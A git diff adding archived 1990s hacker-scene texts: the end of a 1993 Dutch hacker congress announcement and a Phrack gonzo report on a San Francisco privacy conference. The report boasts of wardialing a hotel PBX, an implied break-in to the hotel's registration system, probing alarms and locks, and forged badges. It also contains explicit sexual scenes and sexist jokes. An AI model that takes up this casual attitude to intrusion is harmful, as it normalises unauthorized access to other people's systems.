+for only 100 dutch guilders (currently around US$70).
+
+We will also arrange for the availability of food, drink and smokes of
+assorted types, but this is not included in the price. Our bar will be
+open 24 hours a day, as well as a guarded depository for valuables
+(like laptops, cameras etc.). You may even get your stuff back! For
+people with no tent or air mattress: you can buy a tent through us for
+100 guilders, a mattress costs 10 guilders. You can arrive from 17:00
+(that's five p.m. for analogue types) on August 3rd. We don't have to
+vacate the premises until 12:00 noon on Saturday, August 7 so you can
+even try to sleep through the devastating Party at the End of Time
+(PET) on the closing night (live music provided). We will arrange for
+shuttle buses to and from train stations in the vicinity.
+
+HOW?
+
+Payment: in advance please. Un-organized, poor techno-freaks like us
+would like to get to the Bahamas at least once. We can only guarantee
+you a place if you pay before Friday June 25th, 1993. If you live in
+Holland, just transfer fl. 100 to giro 6065765 (Hack-Tic) and mention
+'HEU' and your name. If you're in Germany, pay DM 100,- to Hack-Tic,
+Konto 2136638, Sparkasse Bielefeld, BLZ 48050161. If you live elsewhere:
+call, fax or e-mail us for the best way to get the money to us from your
+country. We accept American Express, we do NOT cash ANY foreign cheques.
+
+HA!
+
+Very Important: Bring many guitars and laptops.
+
+ME?
+
+Yes, you! Busloads of alternative techno-freaks from all over the
+planet will descend on this event. You wouldn't want to miss that,
+now, would you?
+
+Maybe you are part of that select group that has something special to
+offer! Participating in 'Hacking at the End of the Universe' is
+exciting, but organizing your very own part of it is even more fun. We
+already have a load of interesting workshops and lectures scheduled,
+but we're always on the lookout for more. We're also still in the
+market for people who want to help us organize during the congress.
+
+In whatever way you wish to participate, call, write, e-mail or fax us
+soon, and make sure your money gets here on time. Space is limited.
+
+SO:
+
+- 4th, 5th and 6th of August
+
+- Hacking at the End of the Universe
+  (a hacker summer congress)
+
+- ANWB groepsterrein Larserbos
+  Zeebiesweg 47
+  8219 PT  Lelystad
+  The Netherlands
+
+- Cost: fl. 100,- (+/- 70 US$) per person
+  (including 4 nights in your own tent)
+
+MORE INFO:
+
+Hack-Tic
+Postbus 22953
+1100 DL  Amsterdam
+The Netherlands
+
+tel     : +31 20 6001480
+fax     : +31 20 6900968
+E-mail  : heu@hacktic.nl
+
+VIRUS:
+
+If you know a forum or network that you feel this message belongs on,
+by all means slip it in. Echo-areas, your favorite bbs, /etc/motd, IRC,
+WP.BAT, you name it. Spread the worm, uh, word.
+=========================================================================
+
+SCHEDULE
+
+day 0       August 3rd, 1993
+=====
+16:00       You are welcome to set up your tent
+19:00       Improvised Dinner
+
+day 1       August 4th, 1993
+=====
+11:00-12:00 Opening ceremony
+12:00-13:30 Workshops
+14:00-15:30 Workshops
+15:30-19:00 'Networking for the Masses'     16:00-18:00 Workshops
+19:00-21:00 Dinner
+21:30-23:00 Workshops
+
+
+day 2       August 5th, 1993
+=====
+11:30-13:00 Workshops
+14:00-17:00 Phreaking the Phone             14:00-17:00 Workshops
+17:30-19:00 Workshops
+19:00-21:00 Dinner
+
+
+day 3       August 6th, 1993
+=====
+11:30-13:00 Workshops
+14:00-18:00 Hacking (and) The Law           14:00-17:00 Workshops
+18:00-19:00 Closing ceremony
+19:00-21:00 Barbeque
+21:00-??:?? Party at the End of Time (Live Music)
+
+day 4       August 7th, 1993
+=====
+12:00       All good things come to an end
+
+=========================================================================
+
+'Networking for the masses',   Wednesday August 4th 1993, 15:30
+
+One of the main discussions at the 1989 Galactic Hacker Party focused on
+whether or not the alternative community should use computer networking.
+Many people felt a resentment against using a 'tool of oppression' for
+their own purposes. Computer technology was, in the eyes of many,
+something to be smashed rather than used.
+
+Times have changed. Many who were violently opposed to using computers
+in 1989 have since discovered word-processing and desktop publishing.
+Even the most radical groups have replaced typewriters with PCs. The
+'computer networking revolution' has begun to affect the alternative
+community.
+
+Not all is well: many obstacles stand in the way of the 'free flow of
+information.' Groups with access to information pay such high prices for
+it that they are forced to sell information they'd prefer to pass on for
+free. Some low-cost alternative networks have completely lost their
+democratic structure. Is this the era of the digital dictator, or are we
+moving towards digital democracy?
+
+To discuss these and other issues, we've invited the following people
+who are active in the field of computer networking: [Electronic mail
+addresses for each of the participants are shown in brackets.]
+
+Ted Lindgreen (ted@nluug.nl) is managing director of nlnet. Nlnet is the
+largest commercial TCP/IP and UUCP network provider in the Netherlands.
+
+Peter van der Pouw Kraan (peter@hacktic.nl) was actively involved in the
+squat-movement newsletters 'Bluf!' and 'NN' and has outspoken ideas
+about technology and its relation to society. Had a PC all the way back
+in 1985!
+
+Maja van der Velden (maja@agenda.hacktic.nl) is from the Agenda
+Foundation which sets up and supports communication and information
+projects.
+
+Joost Flint (joost@aps.hacktic.nl) is from the Activist Press Service.
+APS has a bbs and works to get alternative-media and pressure groups
+online.
+
+Felipe Rodriquez (nonsenso@utopia.hacktic.nl) is from the Hack-Tic
+Network which grew out of the Dutch computer underground and currently
+connects thousands of people to the global Internet.
+
+Andre Blum (zabkar@roana.hacktic.nl), is an expert in the field of
+wireless communications.
+
+Eelco de Graaff (Eelco.de.Graaff@p5.f1.n281.z2.fidonet.org) is the
+nethost of net 281 of FidoNet, EchoMail troubleshooter, and one of the
+founders of the Dutch Fidonet Foundation.
+
+Michael Polman (michael@antenna.nl) of the Antenna foundation is a
+consultant in the field of international networking. He specialises in
+non-governmental networks in the South.
+
+Alfred Heitink (alfred@antenna.nl) is a social scientist specializing in
+the field of computer-mediated communication as well as system manager at
+the Dutch Antenna host.
+
+Rena Tangens (rena@bionic.zer.de), was involved in the creation of the
+Bionic Mailbox in Bielefeld (Germany) and the Zerberus mailbox network.
+She is an artist and wants to combine art and technology.
+
+The discussion will be led by freelance radiomaker and science
+journalist Herbert Blankesteyn. He was involved in the 'Archie'
+children's bbs of the Dutch VPRO broadcasting corporation.
+=========================================================================
+
+'Phreaking the Phone',   Thursday August 5th 1993, 14:00
+
+Your own telephone may have possibilities you never dreamed possible.
+Many years ago people discovered that one could fool the telephone
+network into thinking you were part of the network and not just a
+customer. As a result, one could make strange and sometimes free
+phonecalls to anywhere on the planet. A subculture quickly formed.
+
+The phone companies got wise and made a lot of things (nearly)
+impossible. What is still possible today? What is still legal today?
+What can they do about it? What are they doing about it?
+
+Billsf (bill@tech.hacktic.nl) and M. Tillman, a few of the worlds best
+phreaks, will introduce the audience to this new world. Phone phreaks
+from many different countries will exchange stories of success and
+defeat. Your life may never be the same.
+=========================================================================
+
+'Hacking (and) The Law',   Friday August 6th, 14:00
+
+You can use your own computer and modem to access some big computer
+system at a university without the people owning that computer knowing
+about it. For years this activity was more or less legal in Holland: if
+you were just looking around on the Internet and didn't break anything
+nobody really cared too much...
+
+That is, until shortly before the new computer crime law went into
+effect. Suddenly computer hackers were portrayed as evil 'crashers'
+intent on destroying systems or, at least, looking into everyone's
+files.
+
+The supporters of the new law said that it was about time something was
+done about it. Critics of the law say it's like hunting mosquitoes with
+a machine-gun. They claim the aforementioned type of hacking is not the
+real problem and that the law is excessively harsh.
+
+To discuss these issues we've invited a panel of experts, some of whom
+are, or have been, in touch with the law in one way or another.
+
+Harry Onderwater (fridge@cri.hacktic.nl), is technical EDP auditor at the
+Dutch National Criminal Intelligence Service (CRI) and is responsible for
+combatting computer crime in the Netherlands. He says he's willing to
+arrest hackers if that is what it takes to make computer systems secure.
+
+Prof. Dr. I.S. (Bob) Herschberg (herschbe@dutiws.twi.tudelft.nl), gained
+a hacker's control over his first system 21 years ago and never ceased
+the good work. Now lecturing, teaching and publishing on computer
+insecurity and imprivacy at the technical university in Delft. His
+thesis: 'penetrating a system is not perpetrating a crime'.
+
+Ronald 'RGB' O. (rgb@utopia.hacktic.nl) has the distinction of being the
+only Dutch hacker arrested before and after the new law went into effect.
+He is a self-taught UNIX security expert and a writer for Hack-Tic
+Magazine.
+
+Ruud Wiggers (ruudw@cs.vu.nl), system manager at the Free University
+(VU) in Amsterdam, has for 10 years been trying to plug holes in system
+security. He was involved in the RGB arrest.
+
+Andy Mueller-Maguhn (andy@cccbln.ccc.de) is from the Chaos Computer Club
+in Germany.
+
+Eric Corley (emmanuel@eff.org) a.k.a. Emmanuel Goldstein is editor
+of the hacker publication '2600 magazine'. The first person to realize
+the huge implications of the government crackdown on hackers in the US.
+
+Winn Schwartau (wschwartau@mcimail.com) is a commercial computer
+security advisor as well as the author of the book 'Terminal
+Compromise'. His new book entitled 'Information Warfare' has just been
+released.
+
+Ray Kaplan (kaplan@bpa.arizona.edu) is a computer security consultant.
+He is constantly trying to bridge the gap between hackers and the
+computer industry. He organizes 'meet the enemy' sessions where system
+managers can teleconference with hackers.
+
+Wietse Venema (wietse@wzv.win.tue.nl) is a systems expert at the
+Technical University in Eindhoven. He is the author of some very well
+known utilities to monitor hacking on unix systems. He has a healthy
+suspicion of anything technical.
+
+Peter Klerks (klerks@rulfsw.leidenuniv.nl) is a scientist at the centre
+for the study of social antagonism at the Leiden University. He has
+studied the Dutch police force extensively, and is author of the book
+'Counterterrorism in the Netherlands.'
+
+Don Stikvoort (stikvoort@surfnet.nl), one of the computer security
+experts for the Dutch Academic Society and chairman of CERT-NL (Computer
+Emergency Response Team). He is also actively involved in SURFnet
+network management.
+
+Rop Gonggrijp (rop@hacktic.nl) was involved in some of the first
+computer break-ins in the Netherlands during the 80's and is now editor
+of Hack-Tic Magazine.
+
+The discussion will be led by Francisco van Jole (fvjole@hacktic.nl),
+journalist for 'De Volkskrant'.
+=========================================================================
+
+WORKSHOPS
+
+HEUnet introduction
+   an introduction to the Hacking at the End of the Universe network.
+
+Jumpstart to VR, 3D world-building on PC's
+   Marc Bennett, editor of Black Ice magazine, will explain how to
+   design worlds on your own PC which can be used in Virtual Reality
+   systems.
+
+Replacing MS/DOS, Running UNIX on your own PC
+   People who are already running unix on their PCs will tell you what
+   unix has to offer and they'll talk about the different flavours in
+   cheap or free unix software available.
+
+Unix security
+   RGB and fidelio have probably created more jobs in the unix security
+   business than the rest of the world put together. They'll talk about
+   some of the ins and outs of unix security.
+
+E-mail networking
+   Should we destroy X400 or shall we let it destroy itself?
+
+'User Authorization Failure'
+   A quick introduction to the VAX/VMS Operating System for those that
+   consider a career in VMS security.
+
+'The right to keep a secret'
+   Encryption offers you the chance to really keep a secret, and
+   governments know it. They want you to use locks that they have the
+   key to. The fight is on!
+
+'Virus about to destroy the earth!'. Don't believe the hype!
+   What is the real threat of computer viruses? What technical
+   possibilities are there? Are we being tricked by a fear-machine that
+   runs on the money spent on anti-virus software?
+
+'It came out of the sky'
+   'Receiving pager information and what not to do with it'. Information
+   to pagers is sent through the air without encryption. Rop Gonggrijp
+   and Bill Squire demonstrate a receiver that picks it all up and
+   present some spooky scenarios describing what one could do with all
+   that information.
+
+Cellular phones and cordless phones
+   How do these systems work, what frequencies do they use, and what are
+   the differences between different systems world-wide?
+
+Zen and the art of lock-picking.
+   In this workshop The Key will let you play with cylinder locks of all
+   types and tell you of ingenious ways to open them.
+
+"Doesn't mean they're not after you"
+   The secret services and other paranoia.
+
+Audio Adventures
+   Steffen Wernery and Tim Pritlove talk about adventure games that you
+   play using a Touch Tone telephone.
+
+Botanical Hacking (THC++)
+   Using computers, modems and other high tech to grow.
+
+Wireless LAN (Data Radio)
+   How high a data rate can you pump through the air, and what is still
+   legal?
+
+Social Engineering
+   The Dude, well known from his articles in Hack-Tic, will teach you
+   the basics of social engineering, the skill of manipulating people
+   within bureaucracies.
+
+'Hacking Plastic'
+   Tim and Billsf talk about the security risks in chip-cards, magnetic
+   cards, credit cards and the like.
+
+Antenna Host Demo
+   The Antenna Foundation is setting up and supporting computer
+   networks, mainly in the South. They are operating a host system in
+   Nijmegen, The Netherlands, and they will demonstrate it in this
+   workshop, and talk about their activities.
+
+APS Demo
+   APS (Activist Press Service) is operating a bbs in Amsterdam, The
+   Netherlands. You'll see it and will be able to play with it
+   'hands-on'.
+
+'Hocking the arts'
+   Benten and Marc Marc are computer artists. They present some of their
+   work under the motto: Hocking the arts, demystifying without losing
+   its magic contents.
+
+Public Unix Demo
+   Demonstrating the Hack-Tic xs4all public unix, as well as other
+   public unix systems.
+
+Packet Radio Demo
+   Showing the possibilities of existing radio amateur packet radio
+   equipment to transport packets of data over the airwaves.
+=========================================================================
+
+COMPUTERS AT 'HACKING AT THE END OF THE UNIVERSE'
+
+This will get a little technical for those who want to know what we're
+going to set up. If you don't know much about computers, just bring
+whatever you have and we'll see how and if we can hook it up.
+
+We're going to have ethernet connected to Internet (TCP/IP). You can
+connect by sitting down at one of our PC's or terminals, by hooking up
+your own equipment (we have a depository, so don't worry about theft),
+or by using one of our 'printerport <--> ethernet' adapters and
+hooking up laptops and notebooks that way. There may be a small fee
+involved here, we don't know what they're going to cost us. Contact us
+for details, also if you have a few of these adapters lying around.
+There might also be serial ports you can connect to using a nullmodem
+cable.
+
+You can log in to our UNIX system(s) and send and receive mail and
+UseNet news that way. Every participant that wants one can get her/his
+own IP number to use worldwide. Users of the network are urged to make
+whatever files they have on their systems available to others over the
+ethernet. Bring anything that has a power cord or batteries and let's
+network it!
+=========================================================================
+
+--
+Hstorm ++31 2230 60551
+Ad Timmering <north@hstorm.hacktic.nl>
\ No newline at end of file
diff --git a/phrack43/8.txt b/phrack43/8.txt
new file mode 100644
index 0000000..71c8d53
--- /dev/null
+++ b/phrack43/8.txt
@@ -0,0 +1,1130 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 8 of 27
+
+                                CONFERENCE NEWS
+                                    PART II
+
+****************************************************************************
+
+Fear & Loathing in San Francisco
+
+By Some Guy
+
+(The names have been changed to protect the guilty.)
+
+1. The Arrival
+
+I had been up for about 48 hours by the time America West dropped
+me off at San Francisco's airport.  The only thing I could think about
+was sleep.  Everything took on strange dreamlike properties as I staggered
+through the airport looking for the baggage claim area.  Somehow, I
+found myself on an airport shuttle headed towards the Burlingame
+Marriott.  Suddenly I was standing in front of an Iranian in a red
+suit asking me for a major credit card.  After a quick shuffle of forms
+at the checkin counter I finally had the cardkey to my room and was
+staggering toward a nice warm bed.
+
+Once in the room I fell down on the bed, exhausted.  Within the space of a
+few minutes I was well on my way to Dreamland.  Within the space of a few
+more minutes I was slammed back into reality as someone came barreling into
+the room.  Mr. Blast had arrived from Chitown with a bag full of corporate
+goodies.  I accepted a shirt and told him to get lost.  No sooner had he left
+than Fitzgerald burst in with enough manuals to stock a small college's
+technical library.  After griping for nearly 30 minutes at the fact that
+I had neglected to likewise bring 500 pounds of 5ess manuals for him,
+Fitzgerald took off.
+
+Sleep.
+
+2. Mindvodxka
+
+After several needed hours rest, I took off downstairs to scope out the
+spread.  I ran into Bruce Sterling who relayed some of the mornings
+events, the highlight of which was Don Delaney's "Finger Hackers"  the
+inner city folks who sequentially dial, by hand, every possible combination
+of pbx code to then sell on street corners.
+
+Out of the corner of my eye I spotted two young turks dressed like
+mafioso:  RBOC & Voxman.  I wandered over and complimented them on their
+wardrobe and told them to buy me drinks.  Beer.  Beer.  More beer.
+Screwdrivers.  Screwdrivers.  Last call.  Last screwdriver.
+
+RBOC and I decided that it was our calling to get more drinks.  We took
+off to find a bar.  Upon exiting the hotel we realized that we were in
+the middle of fucking nowhere.  We walked up and down the street, rapidly
+getting nowhere.  In our quest for booze, we managed to terrorize a
+small oriental woman at a neighboring hotel who, after 10 minutes of our
+screaming and pounding, finally opened up the door to her office wide
+enough to tell us there were no bars within a 15 mile radius.
+We went back to the hotel very distraught.
+
+We went back to RBOC's room where Voxman was sampling a non-tobacco smoke.
+We bitched about the lack of watering holes in the vicinity, but he was
+rather unsympathetic.  After he finished his smoke and left the room, we
+decided to order a bottle of vodka through room service and charge it
+to Voxman since it was roughly 50 dollars.
+
+RBOC called up room service and started to barter with the clerk about the
+bottle.  "Look, tell you what," he said, "I've got twenty bucks.  You meet
+me out back with two bottles.  I give you the twenty and you keep one of
+the bottles for yourself."
+
+"Look man, I know you have about a thousand cases of liquor down there,
+right?  Who's going to miss two bottles?  Don't you want to make a few
+extra bucks?  I mean, twenty dollars, that's got to be about what you make
+in a day, right?  I mean, you aren't exactly going to own this hotel any
+time soon, am I right?  So, I'll be down in a few minutes to meet you
+with the vodka.  What do you mean?   Look man, I'm just trying to help out
+another human being.  I know how it is, I'm not made out of money either,
+you know?  Listen, I'm from NYC...if someone offers me twenty dollars
+for nothing, I take it, you know?  So, do we have a deal?"
+
+This went on for nearly an hour.  Finally RBOC told the guy to just bring up
+the damn bottle.  When it arrived, the food services manager, acting as
+courier, demanded proof of age, and then refused to credit it to the room.
+This sparked a new battle, as we then had to track down Voxman to sign
+for our booze.  After that was settled, a new crisis arose:  We had no
+mixer.
+
+The soda machine proved our saviour.  Orange Slice for only a dollar a
+can.  We decided to mix drinks half and half.  Gathering our fluids,
+we adjourned to the lobby to join Voxman and a few conventioneers.
+The vodka went over well with the crew, and many a glass was quaffed
+over inane conversation about something or other.
+
+Soon the vodka informed me it was bed time.
+
+3. It Begins.
+
+I woke late, feeling like a used condom.  I noticed more bags in the room
+and deduced that X-con had made it to the hotel.  After dressing, I staggered
+down to the convention area for a panel.
+
+"Censorship and Free Speech on the Networks" was the first one I got to
+see.  The main focus of the panel seemed to be complaints of alt.sex
+newsgroups and dirty gifs.  As these two are among my favorite things
+about the net, I took a quick disliking of the forum.  Nothing was resolved
+and nothing was stated.
+
+There was a small break during which I found X-con.  We saw a few feds.
+It was neat.  The head of the FBI's computer crime division called me by name.
+That was not terribly neat.
+
+The next session was called "Portrait of the Artist on the Net."  X-con
+and I didn't get it.  We felt like it was "portrait of the artist on
+drugs on the net."  Weird videos, odd projects, and stream of
+consciousness rants.  Wasn't this a privacy conference?   We were confused.
+
+The session gave way to a reception.  This would have been uneventful had
+it not been for two things:  1) an open bar 2) the arrival of the Unknown
+Hacker.  U.H. was probably the most mysterious and heralded hacker on
+the net.  The fact that he showed up in public was monumental.
+
+The reception gave way to dinner, which was uneventful.
+
+4. Let the Beatings Begin
+
+A few days before the con, Mr. Blast had scoured the net looking for
+dens of inequity at my behest.  In alt.sex.bondage he had run across
+a message referring to "Bondage A Go-Go."   This was a weekly event at
+a club in the industrial district called "The Bridge."  The description
+on the net described it as a dance club where people liked to dress up
+in leather and spikes, and women handcuffed to the bar from
+9-11 drank free!  This was my kind of place.
+
+On that Wednesday night, I could think of nothing but going out and
+getting to Bondage A Go-Go.  I pestered X-con, Mr. Blast and U.H. into
+going.  We tried to get Fender to go too, but he totally lamed out.
+(This would be remembered as the biggest mistake of his life.)
+
+We eventually found ourselves driving around a very seedy part of
+San Francisco.  On one exceedingly dark avenue we noticed a row
+of Harleys and their burly owners hanging outside a major dive.  We
+had found our destination.
+
+Cover was five bucks.  Once inside we were assaulted by pounding
+industrial and women in leather.  RAD!  Beer was a buck fifty.
+Grabbing a Coors and sparking a Camel, I wandered out to the main dance
+floor where some kind of event was taking place.
+
+Upon a raised stage several girlies were undulating in their
+dominatrix get-ups, slowly removing them piece by piece.  A smile
+began to form.  X-con and U.H. found me and likewise denoted their
+approval.  The strip revue continued for a few songs, with the
+girlies removing everything but their attitudes.
+
+The lights went up, and a new girl came out.  She was followed by a
+friend carrying several items.  The first girl began to read rather
+obscure poetry as the second undressed her.  Once girl1 was free
+of restrictive undergarments girl2 donned surgical gloves and
+began pouring generous amounts of lubricant over her hands.  As the
+poetry reached a frantic peak, girl2 slowly inserted her entire hand
+into girl1.
+
+A woman in the crowd screamed.
+
+My smile was so wide, it hurt.
+
+The fisting continued for an eternity, with girl1 moving around the stage
+complaining in her poetic rant about how no man could ever satisfy her.
+(This was of no surprise to me since she had an entire forearm up her twat.)
+Girl2 scampered around underneath, happily pumping away for what seemed like
+an hour.
+
+When the performance ended, a very tall woman in hard dominatrix gear
+sauntered out on the stage.  From her Nazi SS cap to her stiletto heels
+to her riding crop, she was the top of my dreams.  Two accomplices tied
+a seemingly unwilling bottom to the stage and she began striking
+her repeatedly with the crop, to the beat of something that sounded like
+KMFDM.  The screams filled the club, and drool filled the corners of my
+mouth.
+
+As the song ended, the girls all came back out on stage and took a bow
+to deafening applause.  Then the disco ball lit up, and Ministry began
+thundering, and people began to dance like nothing had ever
+happened.  We were a bit stunned.
+
+We all wandered up to the second level where we were greeted by a guy and
+two girls going at it full on.  I staggered dazed to the second story on the
+opposite side.  There was a skinhead getting a huge tattoo and a girl
+getting a smaller one.  I was not brave enough to risk the needle in
+San Francisco, so I wandered back downstairs.  That's where I fell in love.
+
+She was about 5'2", clad in a leather teddy, bobbed blood red hair, carrying
+a cat o'nine tails.  Huge, uh, eyes.  Alas, 'twas not to be.  She was
+leading around a couple of boy toys on studded leashes.  Although the
+guys seemed to be more interested in each other than her, I kept away,
+knowing I would get the hell beaten out of me if I intervened.
+
+As it approached 3:00 am, we decided it was time to go.  We bid a fond
+farewell to the Bridge and took leave.
+
+We all wanted to see Golden Gate, so U.H. directed us towards downtown
+to the bridge.  Passing down Market, we noticed a man lying in a pool of
+blood before a shattered plate glass window, surrounded by cops.
+
+We eventually reached the Golden Gate Bridge.  We drove across to the
+scenic overlook.  Even in the darkness it was rather cool.  We took off
+through the hills and nearly smashed into a few deer with the car.
+It was almost time for the conference by then, so we decided to get back.
+
+5. Thursday
+
+I made it downstairs for the "Medical Information and Privacy" that
+morning.  As I was walking towards the room, I got a sudden flash of
+an airlines advertisement.  The Pilot had arrived.  I was shocked.
+Here was this guy who used to be one of the evil legionnaires, and he
+looked like an actor from a delta commercial...blue suit, aviator
+sunglasses, nappy hat with the little wings.  Appalling.
+
+I drug him into the meeting hall where we sat and made MST3K-like
+commentary during the panel.  I began to get mad that no one had
+even mentioned the lack of legislation regarding medical records privacy,
+nor the human genome project.  I was formulating my rude commentary
+for the question period when the last speaker thankfully brought
+up all these points, and chastised everyone else for not having done
+so previously.  Good job.
+
+I snaked The Pilot a lunch pass, and we grabbed a bite.  It was pretty
+good.  I noticed that it was paid for by Equifax or Mead Data Central
+or some other data-gathering puppet agency of The Man.  No doubt a
+pathetic ploy to sway our feelings.  I ate it anyway.
+
+After lunch, John Perry Barlow got up to bs a bit.  The thing that stuck me
+about Barlow was his rant about the legalization of drugs.  Yet another
+stray from computers & privacy.  It must be nice to be rich enough to
+stand in front of the FBI and say that you like to take acid and think
+it ought to be legal.  I debated whether or not to ask him if he
+knew where to score any in San Francisco, but decided on silence, since
+I'm not rich.
+
+I lost all concept of time and space after Barlow's talk, and have no idea
+what happened between that time and that evening.
+
+6. Birds of a Feather BOF together
+
+That night we went to the Hacker BOF, sponsored by John McMullen.
+Lots of oldies siting around being superior since it wasn't illegal
+when they swiped cpu access, and lots of newbies sitting around feeling
+superior since they had access to far better things than the oldies
+ever dreamed of.
+
+A certain New York State Policeman had been given the remainder of the
+bottle of vodka from the previous night.  It was gone in record time.
+Later he was heard remarking about how hackers should get the death
+penalty.  When Emmanuel Goldstein demonstrated his Demon Dialer from
+the Netherlands, he sat in the corner slamming his fist into his hand
+muttering, "wait till we get home, you'll get yours."
+
+I went outside and hid.  Also hiding outside was Phiber.  We exchanged a
+few glares.  He and I had been exchanging glares since our respective
+arrivals.  But neither of us said anything directly to the other.
+I had heard from several people that Phiber had remarked, "on the third
+day, I'm gonna get that guy.  Just you wait."  I was waiting.
+
+I decided that Thursday should be the night we would all go to a
+strip club.  After telling everyone within a 15 mile radius about
+Bondage A Go-Go, it was rather easy to work up an interest in this
+adventure.  Me, X-con, Mr. Blast, U.H. and Fender would be the
+valiant warriors.
+
+Before making preparations to leave, X-con and Fitzgerald decided to
+check out the hotel's PBX.  Setting up Tone-Loc, X-con's notebook
+set out banging away at the available block of internals.  We
+decided that the hotel had a 75, and yes, it would be ours, oh yes,
+it would be ours.
+
+It was a Herculean task to gather the crew.  Despite their desire to go,
+everyone farted around and rounding them up was akin to a cattle
+drive.  Fender cried about having to attend this BOF and that BOF and
+Mr. Blast cried about being tired, Fitzgerald cried about not being
+old enough to go, and I just cried.  Eventually we gathered our
+crew and launched.
+
+8.  Market Street Madness
+
+We initially went out to locate the Mitchell Brothers club.  I had heard that
+it was quite rad.  Totally nude.  Lap dancing.  Total degradation and
+objectification.  Wowzers.
+
+U.H. said he knew where it was.  He was mistaken.  The address in the
+phone book was wrong.  It was nowhere to be found.  We ended back up
+on Market surrounded by junkies and would-be muggers.  Thankfully,
+there were no fresh corpses.  I saw a marquee with the banner Traci Topps.
+
+Forcing Mr. Blast to pull over, we made a beeline to the entrance.
+Cover was ten dollars, and we had missed Traci's last performance.
+We paid it anyway, since we had bothered to pull over.  Big mistake.
+
+Now, when I think of strip clubs, I think of places like Houston's
+Men's Club, or Atlanta's Gold Club, or Dallas' Fantasy Ranch.  Very
+nice.  Hot women.  Good music.  Booze.  Tables.
+
+We entered a room that used to be a theater.  Sloping aisles along
+theater seats side by side.  Up on the stage, was a tired, unattractive,
+heavy set brunette slumping along to some cheesy pop number.
+I was instantly disgusted.  I felt compelled to tell X-con that strip
+clubs were not like this normally, since he had never been to one, and
+it was my bright idea to be here.
+
+We noticed some old perv at the far end of our row in a trench.  It was
+like out of a bad movie.  He was not at all shy about his self-satisfaction
+and in fact seemed quite proud of it.  He kept trying to get the girls to
+bend down so he could fondle them.  Gross beyond belief.  We debated
+whether or not to point and laugh at him, but decided he might have
+something more deadly concealed under the trench and tried to ignore it.
+
+Some more furniture passed across the stage.  One sauntered over to me
+and asked if I'd like any company.  I asked her what the hell this place
+was all about.  She said that this was the way most places were downtown.
+I told her that I expected tables, beer, and a happy upbeat tempo.  She
+shrugged and said she didn't know of anything really like that.
+
+On the stage a really cute girl popped up.  A shroom on this turd of a club.
+Fender and I both decided she was ours.  Fender said there was no way that
+I would get the only good looking girl in the place.  I said he needed to
+get real, that it would be no contest.
+
+As soon as she left the stage, Fender disappeared.  Later he returned
+smirking.  Moments afterward, the girl appeared and plopped down in his lap.
+(We found out later he paid her.)  He continued his dialogue for about
+20 minutes discussing philosophy or something equally stupid to talk
+to a nude dancer about, and then we got up to leave.  She gave him her
+phone number.  (It was the number to the Special Olympics.)  We left,
+and I apologized to everyone.
+
+We took off to Lombard street and fantasized about letting the rental
+car loose to plummet down the hill, destroying everything in its
+path.  Next time we decided we would.
+
+Then it was decided that it would be a good idea to look for some food.
+We ended up somewhere where there was some kind of dance club.
+Everything was closed and there was no food to be seen.  Walking down
+a few side streets looking for food, U.H. decided to tell Fender that
+he had broken into his machine.  Fender turned about 20 shades of green.
+
+We then went back to the Golden Gate Bridge since it never closed and
+stared out at the bay.   Fender began to talk incoherently so it
+became urgent that we get back to the hotel and put him to bed to dream
+happy dreams of his stripper Edie.
+
+Back at the hotel X-con and I could not sleep.  The notebook had found
+a number of carriers.  One was for a System V unix.  We decided that
+this was the hotel's registration computer.  We knew most used some kind of
+package like encore, so we...well.  :)  We also found several odd systems,
+probably some kind of elevator/ac/power controllers or whatnot.
+
+At 5am or so, X-con and I took off to explore the hotel.  Down in the lobby we
+found RBOC busily typing away to a TTD operator on the AT&T payphone 2000.
+He was engrossed in conversation, so we left him to his typing.
+X-con started to look around the Hertz counter for anything exciting and
+set off the alarm.  Within seconds security arrived to find me
+perched on the shoeshine stand and X-con rapping on the payphone to
+another hotel.  We told him we hadn't seen anyone go behind the counter.
+He didn't believe us but left anyway.
+
+As we burst into fits of laughter, Mitch Kapor, in shorts and t-shirt came
+cruising by and exited through a glass door.  We weren't quite sure if he
+were real so we snuck through the door after him.  The door led to the
+gym.  Mitch was busily pedaling away on an exercycle.
+
+X-con and I decided to explore the hotel since we never even knew there
+was a gym, and who could tell what other wild and wacky places remained
+unseen.  We took off to find the roof, since that was the most obvious
+place to go that we should not be.  Finding the stairwell with roof access,
+we charged up to the top landing.  The roof was unlocked, but right before
+opening the hatch, we noticed that there was a small magnetic contact
+connected to a lead.  Not feeling up to disabling alarm systems so
+late in the evening (or early in the morning), we took off.
+On another level, we found the offices.  Simplex locks.  Amazing.
+Evil grins began to form, but we wimped out, besides it was damn near
+convention time.
+
+9.  Coffee, Coffee and More Coffee
+
+Outside the convention room the caterers had set up the coffee urns.
+X-con and I dove into the java like Mexican cliff jumpers.  It got
+to be really really stupid.  We were slamming coffee like there was no
+tomorrow.  Fuck tomorrow, we slammed it like there was no today.
+I put about eight packets of sugar in each of my cups.  Ahh, nothing like
+a steamin' cup o' joe.  By the time we were done we had each drank
+nearly 20 cups.  The world was alive with an electric hum.  We were ready
+to take on the entire convention.  Yep.  After another cup.
+
+The first panel of the day was "Gender Issues in Computing and
+Telecommunications."   As the talk began, the pig in me grew restless.
+"What's all this crap?" it said.  "Bunch of feminazis bitching about
+gifs.  They should all go to the bridge next Wednesday, that will give them
+a new perspective.  Where's Shit Kickin' Jim when you need him?"
+Then I got more idealistic in my thinking.  "Ok, fine, if women
+demand equal treatment on the net, then what about equal treatment for
+homosexuals?  What about equal treatment for hermaphrodites?  What about
+equal treatment for one-legged retired American Indian Proctologists on
+the net?  And let us not forget the plight of the Hairless.  Geez.  What
+a load of hooey.   I wanted to jump up and yell, "THE NET IS NOT REAL!
+WORRY ABOUT THE REAL WORLD AND THE NET WILL CHANGE!  YOU CANNOT CHANGE
+REALITY BY CHANGING THE NET!"  If only I'd had another cup of coffee, I might
+have done it.
+
+The women got nothing done.  After the panel X-con and I took off to the
+room, after getting a few cups of coffee for the elevator ride.  We sat
+in the hotel room and made rude noises until Mr. Blast and Fitzgerald
+got up.  We all fought for the shower and by noon we were ready to
+venture outward for lunch.
+
+10. Cliffie!
+
+The lunch that day had a few pleasant surprises.  The first came in the
+form of a waitress with HUGE, uh, eyes.  Having something of an
+fetish for big, ahem, eyes, I practiced my patented Manson-like gaze
+for her benefit.  The second surprise came when a the CFP staffers
+cornered a couple of people at our table.
+
+KCrow and Xaen had photocopied lunch tickets and forged badges to hang
+out at the conference.  Finally, on the last day, the staffers suddenly
+decided that these two might not be paying attendees.  Whether it was
+the names on their badges that did not check out, or the fact that
+Xaen had been walking around in a red and white dress-like robe the entire
